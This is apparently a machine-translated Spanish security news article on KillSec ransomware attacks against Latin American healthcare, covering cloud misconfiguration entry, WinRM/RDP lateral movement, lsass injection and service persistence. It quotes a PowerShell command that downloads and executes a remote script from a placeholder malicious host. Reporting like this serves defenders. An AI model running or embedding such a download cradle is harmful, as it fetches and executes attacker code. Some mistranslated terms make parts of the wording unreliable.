La cepa de ransomware KillSec ha surgido rápidamente como una amenaza formidable que se dirige a las infraestructuras de TI de atención médica en América Latina y más allá.
Observado por primera vez a principios de septiembre de 2025, los operadores de KillSec han aprovechado las relaciones de la cadena de suministro de software comprometido para implementar sus cargas útiles a escala.
Se detectaron indicadores iniciales de compromiso cuando varios proveedores de atención médica brasileños informaron un tráfico de red inusual que se originó en cubos de almacenamiento en la nube.
Sin característica, este grupo combina métodos de exfiltración rudimentarios, como los cubos de AWS S3 abiertos, con rutinas de cifrado sofisticadas, maximizando el impacto al tiempo que minimiza la complejidad inicial de la intrusión.
Los analistas de Resecurity señalaron que el punto de entrada de Killsec con frecuencia implica aplicaciones web sin parpadear o almacenamiento en la nube mal configurado, ambos comunes en entornos de salud que se someten a una rápida transformación digital.
Una vez dentro, el malware se propaga a través de redes internas a través de protocolos administrativos legítimos, incluida la administración remota de Windows (WINRM) y el protocolo de escritorio remoto (RDP).
CyberAtack on MedicicSolution (Fuente – Resecurity)
Este movimiento lateral a menudo permanece sin ser detectado durante días, dando a los adversarios un tiempo suficiente para cosechar registros médicos confidenciales e información de identificación personal (PII).
El sitio de fuga de datos del grupo en TOR ha mostrado exfiltraciones de alto perfil, confirmando su disposición a avergonzar públicamente a las víctimas para coaccionar los pagos de rescate.
Después del compromiso, los actores de KillSec ejecutan un proceso de cifrado en varias etapas, utilizando un cargador ligero que invoca una rutina de cifrado AES-256 personalizada.
Investigadores de reseño identificado El cargador por su hashing de importación único y su manipulación inusual de la biblioteca advapi32.dll, lo que sugiere una evasión intencional de la heurística antivirus.
Su uso combinado de API legítimas del sistema y componentes criptográficos autodesarrollados hacen que la detección tradicional basada en la firma sea en gran medida ineficaz, destacando la creciente sofisticación técnica del grupo.
Dentro de una semana de su aparición, KillSec ha impactado en más de una docena de entidades de atención médica, exfiltrando más de 34 GB de datos, incluidas imágenes de pacientes, resultados de laboratorio y registros relacionados con menores, antes de activar las demandas de ransomware.
La fuga pública visible de estos archivos ha llevado a los reguladores a emitir notificaciones de incumplimiento urgente bajo el marco LGPD de Brasil.
Los informes de inteligencia de amenazas ahora advierten que las clínicas y los laboratorios aguas abajo que utilizan el software afectado podrían enfrentar compromisos secundarios si el código del proveedor comprometido permanece sin firmar y no verificado.
Mecanismo de infección Dive Deep Dive
Un aspecto crítico del éxito de Killsec radica en su mecanismo de infección de doble punta, que combina acceso oportunista a cubos de nubes con un descargador de retroceso integrado en formatos de documentos comunes.
Las víctimas se encuentran por primera vez con un archivo de factura PDF engañoso, disfrazándose de una declaración de facturación de un proveedor médico conocido.
Este PDF malformado explota un día cero en el motor de procesamiento, lo que desencadena la ejecución de una línea de una sola línea de PowerShell:—
PowerShell -nop -W Hidden -C “IEX ((New -Object Net.WebClient) .downloadString (‘hxxp: //malicious.example.com/loader.ps1’))”
Tras la ejecución, este Stub PowerShell recupera una carga útil codificada, la decodifica en la memoria y utiliza la inyección de DLL reflectante para cargar el motor de cifrado AES directamente en lSass.exe.
Esta inyección en línea omite la detección basada en el disco y restringe la visibilidad forense a la memoria volátil.
Luego, el cargador enumera las acciones de la red y las tareas programadas, creando persistencia a través de un servicio disfrazado de Windows llamado WinLevelService. Este servicio está configurado para ejecutarse en la cuenta del sistema, asegurando la ejecución en cada reinicio.
Al ocultar su cargador en documentos benignos y abusar de las configuraciones erróneas de la nube, los operadores de ransomware KillSEC mantienen una alta tasa de éxito contra los objetivos de atención médica, lo que subraya la necesidad de gestión proactiva de la postura de seguridad en la nube y protocolos de desinfectación de documentos rigurosos.
¡Webinar gratuito en vivo en nuevas tácticas de malware de nuestros analistas! Aprenda técnicas de detección avanzada -> Regístrese gratis
